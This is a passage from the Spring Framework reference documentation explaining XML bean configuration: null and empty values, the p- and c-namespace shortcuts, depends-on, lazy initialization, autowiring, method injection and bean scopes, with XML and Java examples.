sets the email property to the empty\n`String` value (\"\").\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"ExampleBean\">\n\t\t<property name=\"email\" value=\"\"\/>\n\t<\/bean>\n----\n\nThe preceding example is equivalent to the following Java code:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n exampleBean.setEmail(\"\")\n----\n\nThe `<null\/>` element handles `null` values. For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"ExampleBean\">\n\t\t<property name=\"email\">\n\t\t\t<null\/>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe above configuration is equivalent to the following Java code:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\texampleBean.setEmail(null)\n----\n\n\n[[beans-p-namespace]]\n==== XML shortcut with the p-namespace\n\nThe p-namespace enables you to use the `bean` element's attributes, instead of nested\n`<property\/>` elements, to describe your property values and\/or collaborating beans.\n\nSpring supports extensible configuration formats <<xsd-configuration,with namespaces>>, which are\nbased on an XML Schema definition. The `beans` configuration format discussed in this\nchapter is defined in an XML Schema document. However, the p-namespace is not defined in\nan XSD file and exists only in the core of Spring.\n\nThe following example shows two XML snippets that resolve to the same result: The first\nuses standard XML format and the second uses the p-namespace.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:p=\"http:\/\/www.springframework.org\/schema\/p\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean name=\"classic\" class=\"com.example.ExampleBean\">\n\t\t\t<property name=\"email\" value=\"foo@bar.com\"\/>\n\t\t<\/bean>\n\n\t\t<bean name=\"p-namespace\" class=\"com.example.ExampleBean\"\n\t\t\tp:email=\"foo@bar.com\"\/>\n\t<\/beans>\n----\n\nThe example shows an attribute in the p-namespace called email in the bean definition.\nThis tells Spring to include a property declaration. As previously mentioned, the\np-namespace does not have a schema definition, so you can set the name of the attribute\nto the property name.\n\nThis next example includes two more bean definitions that both have a reference to\nanother bean:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:p=\"http:\/\/www.springframework.org\/schema\/p\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean name=\"john-classic\" class=\"com.example.Person\">\n\t\t\t<property name=\"name\" value=\"John Doe\"\/>\n\t\t\t<property name=\"spouse\" ref=\"jane\"\/>\n\t\t<\/bean>\n\n\t\t<bean name=\"john-modern\"\n\t\t\tclass=\"com.example.Person\"\n\t\t\tp:name=\"John Doe\"\n\t\t\tp:spouse-ref=\"jane\"\/>\n\n\t\t<bean name=\"jane\" class=\"com.example.Person\">\n\t\t\t<property name=\"name\" value=\"Jane Doe\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nAs you can see, this example includes not only a property value using the p-namespace,\nbut also uses a special format to declare property references. Whereas the first bean\ndefinition uses `<property name=\"spouse\" ref=\"jane\"\/>` to create a reference from bean\n`john` to bean `jane`, the second bean definition uses `p:spouse-ref=\"jane\"` as an\nattribute to do the exact same thing. In this case `spouse` is the property name,\nwhereas the `-ref` part indicates that this is not a straight value but rather a\nreference to another bean.\n\n[NOTE]\n====\nThe p-namespace is not as flexible as the standard XML format. For example, the format\nfor declaring property references clashes with properties that end in `Ref`, whereas the\nstandard XML format does not. We recommend that you choose your approach carefully and\ncommunicate this to your team members, to avoid producing XML documents that use all\nthree approaches at the same time.\n====\n\n\n[[beans-c-namespace]]\n==== XML shortcut with the c-namespace\n\nSimilar to the <<beans-p-namespace>>, the __c-namespace__, newly introduced in Spring\n3.1, allows usage of inlined attributes for configuring the constructor arguments rather\nthen nested `constructor-arg` elements.\n\nLet's review the examples from <<beans-constructor-injection>> with the `c:` namespace:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:c=\"http:\/\/www.springframework.org\/schema\/c\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"bar\" class=\"x.y.Bar\"\/>\n\t\t<bean id=\"baz\" class=\"x.y.Baz\"\/>\n\n\t\t<!-- traditional declaration -->\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<constructor-arg ref=\"bar\"\/>\n\t\t\t<constructor-arg ref=\"baz\"\/>\n\t\t\t<constructor-arg value=\"foo@bar.com\"\/>\n\t\t<\/bean>\n\n\t\t<!-- c-namespace declaration -->\n\t\t<bean id=\"foo\" class=\"x.y.Foo\" c:bar-ref=\"bar\" c:baz-ref=\"baz\" c:email=\"foo@bar.com\"\/>\n\n\t<\/beans>\n----\n\nThe `c:` namespace uses the same conventions as the `p:` one (trailing `-ref` for bean\nreferences) for setting the constructor arguments by their names. And just as well, it\nneeds to be declared even though it is not defined in an XSD schema (but it exists\ninside the Spring core).\n\nFor the rare cases where the constructor argument names are not available (usually if\nthe bytecode was compiled without debugging information), one can use fallback to the\nargument indexes:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- c-namespace index declaration -->\n\t<bean id=\"foo\" class=\"x.y.Foo\" c:_0-ref=\"bar\" c:_1-ref=\"baz\"\/>\n----\n\n[NOTE]\n====\nDue to the XML grammar, the index notation requires the presence of the leading `_` as\nXML attribute names cannot start with a number (even though some IDE allow it).\n====\n\nIn practice, the constructor resolution\n<<beans-factory-ctor-arguments-resolution,mechanism>> is quite efficient in matching\narguments so unless one really needs to, we recommend using the name notation\nthrough-out your configuration.\n\n\n[[beans-compound-property-names]]\n==== Compound property names\n\nYou can use compound or nested property names when you set bean properties, as long as\nall components of the path except the final property name are not `null`. Consider the\nfollowing bean definition.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"foo\" class=\"foo.Bar\">\n\t\t<property name=\"fred.bob.sammy\" value=\"123\" \/>\n\t<\/bean>\n----\n\nThe `foo` bean has a `fred` property, which has a `bob` property, which has a `sammy`\nproperty, and that final `sammy` property is being set to the value `123`. In order for\nthis to work, the `fred` property of `foo`, and the `bob` property of `fred` must not be\n`null` after the bean is constructed, or a `NullPointerException` is thrown.\n\n\n\n[[beans-factory-dependson]]\n=== Using depends-on\n\nIf a bean is a dependency of another that usually means that one bean is set as a\nproperty of another. Typically you accomplish this with the <<beans-ref-element, `<ref\/>`\nelement>> in XML-based configuration metadata. However, sometimes dependencies between\nbeans are less direct; for example, a static initializer in a class needs to be\ntriggered, such as database driver registration. The `depends-on` attribute can\nexplicitly force one or more beans to be initialized before the bean using this element\nis initialized. The following example uses the `depends-on` attribute to express a\ndependency on a single bean:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"beanOne\" class=\"ExampleBean\" depends-on=\"manager\"\/>\n\t<bean id=\"manager\" class=\"ManagerBean\" \/>\n----\n\nTo express a dependency on multiple beans, supply a list of bean names as the value of\nthe `depends-on` attribute, with commas, whitespace and semicolons, used as valid\ndelimiters:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"beanOne\" class=\"ExampleBean\" depends-on=\"manager,accountDao\">\n\t\t<property name=\"manager\" ref=\"manager\" \/>\n\t<\/bean>\n\n\t<bean id=\"manager\" class=\"ManagerBean\" \/>\n\t<bean id=\"accountDao\" class=\"x.y.jdbc.JdbcAccountDao\" \/>\n----\n\n[NOTE]\n====\nThe `depends-on` attribute in the bean definition can specify both an initialization\ntime dependency and, in the case of <<beans-factory-scopes-singleton,singleton>> beans\nonly, a corresponding destroy time dependency. Dependent beans that define a\n`depends-on` relationship with a given bean are destroyed first, prior to the given bean\nitself being destroyed. Thus `depends-on` can also control shutdown order.\n====\n\n\n\n[[beans-factory-lazy-init]]\n=== Lazy-initialized beans\n\nBy default, `ApplicationContext` implementations eagerly create and configure all\n<<beans-factory-scopes-singleton,singleton>> beans as part of the initialization\nprocess. Generally, this pre-instantiation is desirable, because errors in the\nconfiguration or surrounding environment are discovered immediately, as opposed to hours\nor even days later. When this behavior is __not__ desirable, you can prevent\npre-instantiation of a singleton bean by marking the bean definition as\nlazy-initialized. A lazy-initialized bean tells the IoC container to create a bean\ninstance when it is first requested, rather than at startup.\n\nIn XML, this behavior is controlled by the `lazy-init` attribute on the `<bean\/>`\nelement; for example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"lazy\" class=\"com.foo.ExpensiveToCreateBean\" lazy-init=\"true\"\/>\n\t<bean name=\"not.lazy\" class=\"com.foo.AnotherBean\"\/>\n----\n\nWhen the preceding configuration is consumed by an `ApplicationContext`, the bean named\n`lazy` is not eagerly pre-instantiated when the `ApplicationContext` is starting up,\nwhereas the `not.lazy` bean is eagerly pre-instantiated.\n\nHowever, when a lazy-initialized bean is a dependency of a singleton bean that is\n__not__ lazy-initialized, the `ApplicationContext` creates the lazy-initialized bean at\nstartup, because it must satisfy the singleton's dependencies. The lazy-initialized bean\nis injected into a singleton bean elsewhere that is not lazy-initialized.\n\nYou can also control lazy-initialization at the container level by using the\n`default-lazy-init` attribute on the `<beans\/>` element; for example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans default-lazy-init=\"true\">\n\t\t<!-- no beans will be pre-instantiated... -->\n\t<\/beans>\n----\n\n\n\n[[beans-factory-autowire]]\n=== Autowiring collaborators\n\nThe Spring container can __autowire__ relationships between collaborating beans. You can\nallow Spring to resolve collaborators (other beans) automatically for your bean by\ninspecting the contents of the `ApplicationContext`. Autowiring has the following\nadvantages:\n\n* Autowiring can significantly reduce the need to specify properties or constructor\n arguments. (Other mechanisms such as a bean template\n <<beans-child-bean-definitions,discussed elsewhere in this chapter>> are also valuable\n in this regard.)\n* Autowiring can update a configuration as your objects evolve. For example, if you need\n to add a dependency to a class, that dependency can be satisfied automatically without\n you needing to modify the configuration. Thus autowiring can be especially useful\n during development, without negating the option of switching to explicit wiring when\n the code base becomes more stable.\n\nWhen using XML-based configuration metadata footnote:[See\npass:specialcharacters,macros[<<beans-factory-collaborators>>]], you specify autowire\nmode for a bean definition with the `autowire` attribute of the `<bean\/>` element. The\nautowiring functionality has four modes. You specify autowiring __per__ bean and thus\ncan choose which ones to autowire.\n\n[[beans-factory-autowiring-modes-tbl]]\n.Autowiring modes\n|===\n| Mode| Explanation\n\n| no\n| (Default) No autowiring. Bean references must be defined via a `ref` element. Changing\n the default setting is not recommended for larger deployments, because specifying\n collaborators explicitly gives greater control and clarity. To some extent, it\n documents the structure of a system.\n\n| byName\n| Autowiring by property name. Spring looks for a bean with the same name as the\n property that needs to be autowired. For example, if a bean definition is set to\n autowire by name, and it contains a __master__ property (that is, it has a\n __setMaster(..)__ method), Spring looks for a bean definition named `master`, and uses\n it to set the property.\n\n| byType\n| Allows a property to be autowired if exactly one bean of the property type exists in\n the container. If more than one exists, a fatal exception is thrown, which indicates\n that you may not use __byType__ autowiring for that bean. If there are no matching\n beans, nothing happens; the property is not set.\n\n| constructor\n| Analogous to __byType__, but applies to constructor arguments. If there is not exactly\n one bean of the constructor argument type in the container, a fatal error is raised.\n|===\n\nWith __byType__ or __constructor__ autowiring mode, you can wire arrays and\ntyped-collections. In such cases __all__ autowire candidates within the container that\nmatch the expected type are provided to satisfy the dependency. You can autowire\nstrongly-typed Maps if the expected key type is `String`. An autowired Maps values will\nconsist of all bean instances that match the expected type, and the Maps keys will\ncontain the corresponding bean names.\n\nYou can combine autowire behavior with dependency checking, which is performed after\nautowiring completes.\n\n\n[[beans-autowired-exceptions]]\n==== Limitations and disadvantages of autowiring\n\nAutowiring works best when it is used consistently across a project. If autowiring is\nnot used in general, it might be confusing to developers to use it to wire only one or\ntwo bean definitions.\n\nConsider the limitations and disadvantages of autowiring:\n\n* Explicit dependencies in `property` and `constructor-arg` settings always override\n autowiring. You cannot autowire so-called __simple__ properties such as primitives,\n `Strings`, and `Classes` (and arrays of such simple properties). This limitation is\n by-design.\n* Autowiring is less exact than explicit wiring. Although, as noted in the above table,\n Spring is careful to avoid guessing in case of ambiguity that might have unexpected\n results, the relationships between your Spring-managed objects are no longer\n documented explicitly.\n* Wiring information may not be available to tools that may generate documentation from\n a Spring container.\n* Multiple bean definitions within the container may match the type specified by the\n setter method or constructor argument to be autowired. For arrays, collections, or\n Maps, this is not necessarily a problem. However for dependencies that expect a single\n value, this ambiguity is not arbitrarily resolved. If no unique bean definition is\n available, an exception is thrown.\n\nIn the latter scenario, you have several options:\n\n* Abandon autowiring in favor of explicit wiring.\n* Avoid autowiring for a bean definition by setting its `autowire-candidate` attributes\n to `false` as described in the next section.\n* Designate a single bean definition as the __primary__ candidate by setting the\n `primary` attribute of its `<bean\/>` element to `true`.\n* Implement the more fine-grained control available\n with annotation-based configuration, as described in <<beans-annotation-config>>.\n\n\n[[beans-factory-autowire-candidate]]\n==== Excluding a bean from autowiring\n\nOn a per-bean basis, you can exclude a bean from autowiring. In Spring's XML format, set\nthe `autowire-candidate` attribute of the `<bean\/>` element to `false`; the container\nmakes that specific bean definition unavailable to the autowiring infrastructure\n(including annotation style configurations such as <<beans-autowired-annotation,\n`@Autowired`>>).\n\nYou can also limit autowire candidates based on pattern-matching against bean names. The\ntop-level `<beans\/>` element accepts one or more patterns within its\n`default-autowire-candidates` attribute. For example, to limit autowire candidate status\nto any bean whose name ends with __Repository,__ provide a value of *Repository. To\nprovide multiple patterns, define them in a comma-separated list. An explicit value of\n`true` or `false` for a bean definitions `autowire-candidate` attribute always takes\nprecedence, and for such beans, the pattern matching rules do not apply.\n\nThese techniques are useful for beans that you never want to be injected into other\nbeans by autowiring. It does not mean that an excluded bean cannot itself be configured\nusing autowiring. Rather, the bean itself is not a candidate for autowiring other beans.\n\n\n\n\n[[beans-factory-method-injection]]\n=== Method injection\n\nIn most application scenarios, most beans in the container are\n<<beans-factory-scopes-singleton,singletons>>. When a singleton bean needs to\ncollaborate with another singleton bean, or a non-singleton bean needs to collaborate\nwith another non-singleton bean, you typically handle the dependency by defining one\nbean as a property of the other. A problem arises when the bean lifecycles are\ndifferent. Suppose singleton bean A needs to use non-singleton (prototype) bean B,\nperhaps on each method invocation on A. The container only creates the singleton bean A\nonce, and thus only gets one opportunity to set the properties. The container cannot\nprovide bean A with a new instance of bean B every time one is needed.\n\nA solution is to forego some inversion of control. You can <<beans-factory-aware,make\nbean A aware of the container>> by implementing the `ApplicationContextAware` interface,\nand by <<beans-factory-client,making a getBean(\"B\") call to the container>> ask for (a\ntypically new) bean B instance every time bean A needs it. The following is an example\nof this approach:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ a class that uses a stateful Command-style class to perform some processing\n\tpackage fiona.apple;\n\n\t\/\/ Spring-API imports\n\timport org.springframework.beans.BeansException;\n\timport org.springframework.context.ApplicationContext;\n\timport org.springframework.context.ApplicationContextAware;\n\n\tpublic class CommandManager implements ApplicationContextAware {\n\n\t\tprivate ApplicationContext applicationContext;\n\n\t\tpublic Object process(Map commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\tprotected Command createCommand() {\n\t\t\t\/\/ notice the Spring API dependency!\n\t\t\treturn this.applicationContext.getBean(\"command\", Command.class);\n\t\t}\n\n\t\tpublic void setApplicationContext(\n\t\t\t\tApplicationContext applicationContext) throws BeansException {\n\t\t\tthis.applicationContext = applicationContext;\n\t\t}\n\t}\n----\n\nThe preceding is not desirable, because the business code is aware of and coupled to the\nSpring Framework. Method Injection, a somewhat advanced feature of the Spring IoC\ncontainer, allows this use case to be handled in a clean fashion.\n\n****\nYou can read more about the motivation for Method Injection in\nhttps:\/\/spring.io\/blog\/2004\/08\/06\/method-injection\/[this blog entry].\n****\n\n\n[[beans-factory-lookup-method-injection]]\n==== Lookup method injection\n\nLookup method injection is the ability of the container to override methods on\n__container managed beans__, to return the lookup result for another named bean in the\ncontainer. The lookup typically involves a prototype bean as in the scenario described\nin the preceding section. The Spring Framework implements this method injection by using\nbytecode generation from the CGLIB library to generate dynamically a subclass that\noverrides the method.\n\n[NOTE]\n====\n* For this dynamic subclassing to work, the class that the Spring bean container will\n subclass cannot be `final`, and the method to be overridden cannot be `final` either.\n* Unit-testing a class that has an `abstract` method requires you to subclass the class\n yourself and to supply a stub implementation of the `abstract` method.\n* Concrete methods are also necessary for component scanning which requires concrete\n classes to pick up.\n* A further key limitation is that lookup methods won't work with factory methods and\n in particular not with `@Bean` methods in configuration classes, since the container\n is not in charge of creating the instance in that case and therefore cannot create\n a runtime-generated subclass on the fly.\n====\n\nLooking at the `CommandManager` class in the previous code snippet, you see that the\nSpring container will dynamically override the implementation of the `createCommand()`\nmethod. Your `CommandManager` class will not have any Spring dependencies, as can be\nseen in the reworked example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage fiona.apple;\n\n\t\/\/ no more Spring imports!\n\n\tpublic abstract class CommandManager {\n\n\t\tpublic Object process(Object commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command interface\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t\/\/ okay... but where is the implementation of this method?\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nIn the client class containing the method to be injected (the `CommandManager` in this\ncase), the method to be injected requires a signature of the following form:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<public|protected> [abstract] <return-type> theMethodName(no-arguments);\n----\n\nIf the method is `abstract`, the dynamically-generated subclass implements the method.\nOtherwise, the dynamically-generated subclass overrides the concrete method defined in\nthe original class. For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- a stateful bean deployed as a prototype (non-singleton) -->\n\t<bean id=\"myCommand\" class=\"fiona.apple.AsyncCommand\" scope=\"prototype\">\n\t\t<!-- inject dependencies here as required -->\n\t<\/bean>\n\n\t<!-- commandProcessor uses statefulCommandHelper -->\n\t<bean id=\"commandManager\" class=\"fiona.apple.CommandManager\">\n\t\t<lookup-method name=\"createCommand\" bean=\"myCommand\"\/>\n\t<\/bean>\n----\n\nThe bean identified as __commandManager__ calls its own method `createCommand()`\nwhenever it needs a new instance of the __myCommand__ bean. You must be careful to deploy\nthe `myCommand` bean as a prototype, if that is actually what is needed. If it is\n as a <<beans-factory-scopes-singleton,singleton>>, the same instance of the `myCommand`\nbean is returned each time.\n\nAlternatively, within the annotation-based component model, you may declare a lookup\nmethod through the `@Lookup` annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\n\t\tpublic Object process(Object commandState) {\n\t\t\tCommand command = createCommand();\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t@Lookup(\"myCommand\")\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nOr, more idiomatically, you may rely on the target bean getting resolved against the\ndeclared return type of the lookup method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\n\t\tpublic Object process(Object commandState) {\n\t\t\tMyCommand command = createCommand();\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t@Lookup\n\t\tprotected abstract MyCommand createCommand();\n\t}\n----\n\nNote that you will typically declare such annotated lookup methods with a concrete\nstub implementation, in order for them to be compatible with Spring's component\nscanning rules where abstract classes get ignored by default. This limitation does not\napply in case of explicitly registered or explicitly imported bean classes.\n\n[TIP]\n====\nAnother way of accessing differently scoped target beans is an `ObjectFactory`\/\n`Provider` injection point. Check out <<beans-factory-scopes-other-injection>>.\n\nThe interested reader may also find the `ServiceLocatorFactoryBean` (in the\n`org.springframework.beans.factory.config` package) to be of use.\n====\n\n\n[[beans-factory-arbitrary-method-replacement]]\n==== Arbitrary method replacement\n\nA less useful form of method injection than lookup method injection is the ability to\nreplace arbitrary methods in a managed bean with another method implementation. Users\nmay safely skip the rest of this section until the functionality is actually needed.\n\nWith XML-based configuration metadata, you can use the `replaced-method` element to\nreplace an existing method implementation with another, for a deployed bean. Consider\nthe following class, with a method computeValue, which we want to override:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyValueCalculator {\n\n\t\tpublic String computeValue(String input) {\n\t\t\t\/\/ some real code...\n\t\t}\n\n\t\t\/\/ some other methods...\n\n\t}\n----\n\nA class implementing the `org.springframework.beans.factory.support.MethodReplacer`\ninterface provides the new method definition.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/**\n\t * meant to be used to override the existing computeValue(String)\n\t * implementation in MyValueCalculator\n\t *\/\n\tpublic class ReplacementComputeValue implements MethodReplacer {\n\n\t\tpublic Object reimplement(Object o, Method m, Object[] args) throws Throwable {\n\t\t\t\/\/ get the input value, work with it, and return a computed result\n\t\t\tString input = (String) args[0];\n\t\t\t...\n\t\t\treturn ...;\n\t\t}\n\t}\n----\n\nThe bean definition to deploy the original class and specify the method override would\nlook like this:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"myValueCalculator\" class=\"x.y.z.MyValueCalculator\">\n\t\t<!-- arbitrary method replacement -->\n\t\t<replaced-method name=\"computeValue\" replacer=\"replacementComputeValue\">\n\t\t\t<arg-type>String<\/arg-type>\n\t\t<\/replaced-method>\n\t<\/bean>\n\n\t<bean id=\"replacementComputeValue\" class=\"a.b.c.ReplacementComputeValue\"\/>\n----\n\nYou can use one or more contained `<arg-type\/>` elements within the `<replaced-method\/>`\nelement to indicate the method signature of the method being overridden. The signature\nfor the arguments is necessary only if the method is overloaded and multiple variants\nexist within the class. For convenience, the type string for an argument may be a\nsubstring of the fully qualified type name. For example, the following all match\n`java.lang.String`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tjava.lang.String\n\tString\n\tStr\n----\n\nBecause the number of arguments is often enough to distinguish between each possible\nchoice, this shortcut can save a lot of typing, by allowing you to type only the\nshortest string that will match an argument type.\n\n\n\n\n[[beans-factory-scopes]]\n== Bean scopes\nWhen you create a bean definition, you create a __recipe__ for creating actual instances\nof the class defined by that bean definition. The idea that a bean definition is a\nrecipe is important, because it means that, as with a class, you can create many object\ninstances from a single recipe.\n\nYou can control not only the various dependencies and configuration values that are to\nbe plugged into an object that is created from a particular bean definition, but also\nthe __scope__ of the objects created from a particular bean definition. This approach is\npowerful and flexible in that you can __choose__ the scope of the objects you create\nthrough configuration instead of having to bake in the scope of an object at the Java\nclass level. Beans can be defined to be deployed in one of a number of scopes: out of\nthe box, the Spring Framework supports six scopes, five of which are available only if\nyou use a web-aware `ApplicationContext`.\n\nThe following scopes are supported out of the box. You can also create\n<<beans-factory-scopes-custom,a custom scope.>>\n\n[[beans-factory-scopes-tbl]]\n.Bean scopes\n|===\n| Scope| Description\n\n| <<beans-factory-scopes-singleton,singleton>>\n| (Default) Scopes a single bean definition to a single object instance per Spring IoC\n container.\n\n| <<beans-factory-scopes-prototype,prototype>>\n| Scopes a single bean definition to any number of object instances.\n\n| <<beans-factory-scopes-request,request>>\n| Scopes a single bean definition to the lifecycle of a single HTTP request; that is,\n each HTTP request has its own instance of a bean created off the back of a single bean\n definition. Only valid in the context of a web-aware Spring `ApplicationContext`.\n\n| <<beans-factory-scopes-session,session>>\n| Scopes a single bean definition to the lifecycle of an HTTP `Session`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n\n| <<beans-factory-scopes-application,application>>\n| Scopes a single bean definition to the lifecycle of a `ServletContext`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n\n| <<websocket-stomp-websocket-scope,websocket>>\n| Scopes a single bean definition to the lifecycle of a `WebSocket`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n|===\n\n[NOTE]\n====\nAs of Spring 3.0, a __thread scope__ is available, but is not registered by default. For\nmore information, see the documentation for\n{api-spring-framework}\/context\/support\/SimpleThreadScope.html[`SimpleThreadScope`].\nFor instructions on how to register this or any other custom scope, see\n<<beans-factory-scopes-custom-using>>.\n====\n\n\n\n[[beans-factory-scopes-singleton]]\n=== The singleton scope\n\nOnly one __shared__ instance of a singleton bean is managed, and all requests for beans\nwith an id or ids matching that bean definition result in that one specific bean\ninstance being returned by the Spring container.\n\nTo put it another way, when you define a bean definition and it is scoped as a\nsingleton, the Spring IoC container creates __exactly one__ instance of the object\ndefined by that bean definition. This single instance is stored in a cache of such\nsingleton beans, and __all subsequent requests and references__ for that named bean\nreturn the cached object.\n\nimage::images\/singleton.png[width=400]\n\nSpring's concept of a singleton bean differs from the Singleton pattern as defined in\nthe Gang of Four (GoF) patterns book. The GoF Singleton hard-codes the scope of an\nobject such that one __and only one__ instance of a particular class is created __per\nClassLoader__. The scope of the Spring singleton is best described as __per container\nand per bean__. This means that if you define one bean for a particular class in a\nsingle Spring container, then the Spring container creates one __and only one__ instance\nof the class defined by that bean definition. __The singleton scope is the default scope\nin Spring__. To define a bean as a singleton in XML, you would write, for example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"com.foo.DefaultAccountService\"\/>\n\n\t<!-- the following is equivalent, though redundant (singleton scope is the default) -->\n\t<bean id=\"accountService\" class=\"com.foo.DefaultAccountService\" scope=\"singleton\"\/>\n----\n\n\n\n[[beans-factory-scopes-prototype]]\n=== The prototype scope\n\nThe non-singleton, prototype scope of bean deployment results in the __creation of a new\nbean instance__ every time a request for that specific bean is made. That is, the bean\nis injected into another bean or you request it through a `getBean()` method call on the\ncontainer. As a rule, use the prototype scope for all stateful beans and the singleton\nscope for stateless beans.\n\nThe following diagram illustrates the Spring prototype scope. __A data access object\n(DAO) is not typically configured as a prototype, because a typical DAO does not hold\nany conversational state; it was just easier for this author to reuse the core of the\nsingleton diagram.__\n\nimage::images\/prototype.png[width=400]\n\nThe following example defines a bean as a prototype in XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"com.foo.DefaultAccountService\" scope=\"prototype\"\/>\n----\n\nIn contrast to the other scopes, Spring does not manage the complete lifecycle of a\nprototype bean: the container instantiates, configures, and otherwise assembles a\nprototype object, and hands it to the client, with no further record of that prototype\ninstance. Thus, although__ initialization__ lifecycle callback methods are called on all\nobjects regardless of scope, in the case of prototypes, configured __destruction__\nlifecycle callbacks are __not__ called. The client code must clean up prototype-scoped\nobjects and release expensive resources that the prototype bean(s) are holding. To get\nthe Spring container to release resources held by prototype-scoped beans, try using a\ncustom <<beans-factory-extension-bpp,bean post-processor>>, which holds a reference to\nbeans that need to be cleaned up.\n\nIn some respects, the Spring container's role in regard to a prototype-scoped bean is a\nreplacement for the Java `new` operator. All lifecycle management past that point must\nbe handled by the client. (For details on the lifecycle of a bean in the Spring\ncontainer, see <<beans-factory-lifecycle>>.)\n\n\n\n[[beans-factory-scopes-sing-prot-interaction]]\n=== Singleton beans with prototype-bean dependencies\n\nWhen you use singleton-scoped beans with dependencies on prototype beans, be aware that\n__dependencies are resolved at instantiation time__. Thus if you dependency-inject a\nprototype-scoped bean into a singleton-scoped bean, a new prototype bean is instantiated\nand then dependency-injected into the singleton bean. The prototype instance is the sole\ninstance that is ever supplied to the singleton-scoped bean.\n\nHowever, suppose you want the singleton-scoped bean to acquire a new instance of the\nprototype-scoped bean repeatedly at runtime. You cannot dependency-inject a\nprototype-scoped bean into your singleton bean, because that injection occurs only\n__once__, when the Spring container is instantiating the singleton bean and resolving\nand injecting its dependencies. If you need a new instance of a prototype bean at\nruntime more than once, see <<beans-factory-method-injection>>\n\n\n\n[[beans-factory-scopes-other]]\n=== Request, session, application, and WebSocket scopes\n\nThe `request`, `session`, `application`, and `websocket` scopes are __only__ available\nif you use a web-aware Spring `ApplicationContext` implementation (such as\n`XmlWebApplicationContext`). If you use these scopes with regular Spring IoC containers\nsuch as the `ClassPathXmlApplicationContext`, an `IllegalStateException` will be thrown\ncomplaining about an unknown bean scope.\n\n\n[[beans-factory-scopes-other-web-configuration]]\n==== Initial web configuration\n\nTo support the scoping of beans at the `request`, `session`, `application`, and\n`websocket` levels (web-scoped beans), some minor initial configuration is\nrequired before you define your beans. (This initial setup is __not__ required\nfor the standard scopes, `singleton` and `prototype`.)\n\nHow you accomplish this initial setup depends on your particular Servlet environment.\n\nIf you access scoped beans within Spring Web MVC, in effect, within a request that is\nprocessed by the Spring `DispatcherServlet`, then no special setup is necessary:\n`DispatcherServlet` already exposes all relevant state.\n\nIf you use a Servlet 2.5 web container, with requests processed outside of Spring's\n`DispatcherServlet` (for example, when using JSF or Struts), you need to register 